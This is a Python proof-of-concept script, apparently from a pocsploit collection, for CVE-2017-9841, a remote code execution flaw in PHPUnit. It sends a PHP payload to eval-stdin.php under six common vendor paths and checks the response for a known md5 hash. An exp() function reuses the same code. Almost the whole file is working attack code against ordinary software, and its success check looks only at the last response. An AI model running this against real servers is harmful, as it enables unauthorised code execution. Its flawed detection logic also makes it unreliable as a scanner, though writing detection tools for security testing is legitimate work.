2017/CVE-2017-9841/poc/pocsploit/CVE-2017-9841.py

import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''PHPUnit < 4.8.28 and 5.x - 5.63 Arbitrary Code Execution''',
        "description": '''Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI''',
        "severity": "critical",
        "references": [
            "https://github.com/cyberharsh/Php-unit-CVE-2017-9841", 
            "https://github.com/RandomRobbieBF/phpunit-brute", 
            "https://thephp.cc/articles/phpunit-a-security-risk", 
            "https://twitter.com/sec715/status/1411517028012158976"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "cvss-score": "",
            "cve-id": "CVE-2017-9841",
            "cwe-id": "CWE-94"
        },
        "metadata":{
            "vuln-target": "",
            
        },
        "tags": ["cve", "cve2017", "php", "phpunit", "rce"],
    }


# Vender Fingerprint
def fingerprint(url):
    return True

# Proof of Concept
def poc(url):
    result = {}
    try:
        url = format_url(url)

        path = """/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"""
        method = "GET"
        data = """<?php echo md5(phpunit_rce);?>"""
        headers = {'Content-Type': 'text/html'}
        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        path = """/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"""
        method = "GET"
        data = """<?php echo md5(phpunit_rce);?>"""
        headers = {'Content-Type': 'text/html'}
        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        path = """/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"""
        method = "GET"
        data = """<?php echo md5(phpunit_rce);?>"""
        headers = {'Content-Type': 'text/html'}
        resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        path = """/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"""
        method = "GET"
        data = """<?php echo md5(phpunit_rce);?>"""
        headers = {'Content-Type': 'text/html'}
        resp3 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        path = """/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"""
        method = "GET"
        data = """<?php echo md5(phpunit_rce);?>"""
        headers = {'Content-Type': 'text/html'}
        resp4 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        path = """/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"""
        method = "GET"
        data = """<?php echo md5(phpunit_rce);?>"""
        headers = {'Content-Type': 'text/html'}
        resp5 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)

        if ("""6dd70f16549456495373a337e6708865""" in resp5.text) and (resp5.status_code == 200):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path

    except:
        result["success"] = False
    
    return result


# Exploit, can be same with poc()
def exp(url):
    return poc(url)


# Utils
def format_url(url):
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')

    return url